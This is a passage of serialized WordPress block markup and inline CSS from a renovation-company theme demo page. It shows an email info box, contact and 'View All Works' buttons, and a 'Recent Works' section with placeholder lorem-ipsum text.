{\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"600\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":19,\"title\":\"email-icon\",\"filename\":\"email-icon.png\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/email-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/email-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"email-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:34.000Z\",\"modified\":\"2021-05-25T13:48:34.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"322c42b944\",\"delete\":\"c562e168cc\",\"edit\":\"244b0c81a3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=19u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":451,\"filesizeHumanReadable\":\"451 B\",\"context\":\"\",\"height\":16,\"width\":23,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/email-icon.png\",\"height\":16,\"width\":23,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"127121dc-c0ee-4fa2-ab99-cde913b95087\"} -->\n<style type=\"text/css\"> .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087 .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/email-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:600;font-family:Poppins;margin-bottom:5px\">Email Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">info@sitename.com</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Contact Us\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/contact-layout-1/\",\"counterId\":\"ea936b78-7fd5-42d7-956e-27032778f79c\",\"vPadding\":15,\"hPadding\":35,\"vMargin\":0,\"hMargin\":0,\"borderRadius\":50,\"borderStyle\":\"none\",\"borderColor\":\"#ffffff\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":16,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 0px !important; margin-bottom: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 15px; padding-bottom: 15px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: #ffffff; border-radius: 50px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 16px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 16px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/contact-layout-1/\">Contact Us</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"17db4860-e165-45ac-b0a9-e22b2a19eff2\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"colorLocation1\":68,\"colorLocation2\":44,\"backgroundColor1\":\"#072d69\",\"backgroundColor2\":\"#012257\",\"backgroundType\":\"gradient\",\"className\":\"gb-renovation-section-3\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-3 skt-blocks-block-section-outer-wrap block-17db4860-e165-45ac-b0a9-e22b2a19eff2 background-type-gradient alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-17db4860-e165-45ac-b0a9-e22b2a19eff2 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-17db4860-e165-45ac-b0a9-e22b2a19eff2 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-17db4860-e165-45ac-b0a9-e22b2a19eff2 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-17db4860-e165-45ac-b0a9-e22b2a19eff2.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-17db4860-e165-45ac-b0a9-e22b2a19eff2.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-17db4860-e165-45ac-b0a9-e22b2a19eff2.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-17db4860-e165-45ac-b0a9-e22b2a19eff2.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-17db4860-e165-45ac-b0a9-e22b2a19eff2.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-17db4860-e165-45ac-b0a9-e22b2a19eff2 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-17db4860-e165-45ac-b0a9-e22b2a19eff2 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-17db4860-e165-45ac-b0a9-e22b2a19eff2.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-17db4860-e165-45ac-b0a9-e22b2a19eff2 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-17db4860-e165-45ac-b0a9-e22b2a19eff2.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-17db4860-e165-45ac-b0a9-e22b2a19eff2 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-17db4860-e165-45ac-b0a9-e22b2a19eff2.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-image:linear-gradient(90deg, rgba(7, 45, 105, 1) 68%,rgba(1, 34, 87, 1) 44%);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"1a9955bb-6ac1-4576-9439-3a9b3cf54dc9\"} -->\n<style type=\"text/css\"> .block-1a9955bb-6ac1-4576-9439-3a9b3cf54dc9 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-1a9955bb-6ac1-4576-9439-3a9b3cf54dc9 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-1a9955bb-6ac1-4576-9439-3a9b3cf54dc9 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-1a9955bb-6ac1-4576-9439-3a9b3cf54dc9 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-1a9955bb-6ac1-4576-9439-3a9b3cf54dc9 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-1a9955bb-6ac1-4576-9439-3a9b3cf54dc9 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-1a9955bb-6ac1-4576-9439-3a9b3cf54dc9 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-1a9955bb-6ac1-4576-9439-3a9b3cf54dc9 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":34,\"rightPaddingTablet\":0,\"blockId\":\"72b14352-e4a7-4202-8371-898a4070517e\"} -->\n<style type=\"text/css\"> .block-72b14352-e4a7-4202-8371-898a4070517e .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-72b14352-e4a7-4202-8371-898a4070517e .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-72b14352-e4a7-4202-8371-898a4070517e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-72b14352-e4a7-4202-8371-898a4070517e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-72b14352-e4a7-4202-8371-898a4070517e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-72b14352-e4a7-4202-8371-898a4070517e\" style=\"width:34%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:1px;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\">We take pride in our work</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"typography\":{\"fontSize\":17}},\"textColor\":\"white\",\"className\":\"section-content\"} -->\n<p class=\"section-content has-white-color has-text-color\" style=\"font-size:17px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy telluseu semper nunc finibus placerat. Suspendissee potenti. Praesent vel sem in sem vulputate.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":50} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"VIEW ALL WORKS\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/recent-works/\",\"counterId\":\"523235bc-2db6-4b36-807b-ccf57ff2b66a\",\"vPadding\":17,\"hPadding\":35,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"#0d2e63\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#ffffff\",\"buttonFontWeight\":\"700\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px !important; margin-bottom: 10px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 17px; padding-bottom: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 